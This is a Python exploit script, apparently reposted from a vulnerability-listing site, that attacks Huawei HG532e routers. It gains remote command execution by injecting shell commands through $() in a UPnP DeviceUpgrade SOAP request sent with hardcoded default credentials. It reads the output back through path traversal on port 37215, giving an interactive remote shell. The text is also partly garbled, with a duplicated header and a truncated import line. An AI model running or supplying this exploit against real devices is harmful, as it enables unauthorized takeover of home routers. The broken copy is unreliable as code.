#!/bin/python
'''
Author : Rebellion
Github : @rebe11ion
Twitter : @rebellion
'''
import urllib2,requests,os,sys
fr #!/bin/python
'''
Author : Rebellion
Github : @rebe11ion
Twitter : @rebellion
'''
import urllib2,requests,os,sys
from requests.auth import HTTPDigestAuth
DEFAULT_HEADERS = {"User-Agent": "Mozilla", }
DEFAULT_TIMEOUT = 5
def fetch_url(url):
global DEFAULT_HEADERS, DEFAULT_TIMEOUT
request = urllib2.Request(url, headers=DEFAULT_HEADERS)
data = urllib2.urlopen(request, timeout=DEFAULT_TIMEOUT).read()
return data
def exploit(ip, path):
url = "http://%s:37215/icon/../../../%s" % (ip, path)
data = fetch_url(url)
return data
def main():
pwd = "/"
cmd_path = "/tmp/ccmd"
pwd_path = "/tmp/cpwd"
while True:
targetip = sys.argv[1]
cmd_ = raw_input("[{}]$ ".format(pwd))
cmd = "cd {} ; {} > {} ; pwd > {}".format(pwd,cmd_.split("|")[0],cmd_path,pwd_path)
rm = "<?xml version="1.0" ?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
<NewStatusURL>$(" + cmd + ")</NewStatusURL>
<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>
</u:Upgrade>
</s:Body>
</s:Envelope>"
url = "http://192.168.1.1:37215/ctrlt/DeviceUpgrade_1"
requests.post(url, auth=HTTPDigestAuth('dslf-config', 'admin'), data=rm)
assert cmd_path.startswith("/"), "An absolute path is required"
data = exploit(targetip, cmd_path)
open(cmd_path,"wb").write(data)
if "cd" in cmd_:
pass
elif "clear" in cmd_:
os.system("clear")
elif "cat" in cmd_:
os.system(cmd_.replace(cmd_.split("cat")[1].split(" ")[1],cmd_path))
else:
if "|" in cmd_:
os.system("cat {} | {}".format(cmd_path,cmd_.split("|")[1]))
else:
os.system("cat {}".format(cmd_path))
pwd = exploit(targetip,pwd_path).strip("
")
if __name__ == "__main__":
main()
Huawei Router HG532e Command Execution
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 414